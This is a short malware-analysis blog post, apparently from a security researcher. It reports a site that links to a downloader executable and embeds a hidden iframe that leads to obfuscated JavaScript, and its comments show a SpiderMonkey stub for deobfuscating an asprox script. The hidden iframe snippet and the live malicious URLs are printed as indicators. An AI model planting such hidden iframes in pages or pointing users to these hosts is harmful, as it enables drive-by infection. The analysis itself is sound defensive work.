the URL contains links to http://www.ok2bstr8.com/view.exe

view.exe is a downloader – VT analysis

The URL also has an iframe embedded:

<iframe id=”01″ src=”2.html” frameborder=”0″ style=”display:none”></iframe>

2.html links to malicious obfuscated JS:

<meta http-equiv=”refresh” content=”2;URL=″>

The above IP is associated with many domains such as minimal345.com


2 Responses to “www.ok2bstr8.com/index_13.html”

  1. Hello, wondering if you’ve been able to decode the new script being used by asprox. Sample @ http://92prt.ru/cgi-bin/index.cgi?script

    I have not been able to do so using spider monkey wondering if you’ve done some analysis on this before.


  2. first, strip html entities off the “index.cgi?script” content.

    second, create a stub file, stub.js, with the following contents:
    function eval(a) {print(a);}
    location = new Object();
    location.href = “http://92prt.ru/cgi-bin/index.cgi?script”;
    document= new Object();
    document = {write:print};
    navigator = new Object();
    navigator.appMinorVersion = “;SP2;”
    navigator.systemLanguage = “en-us”

    then issue command “js -f stub.js index.cgi\?script”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: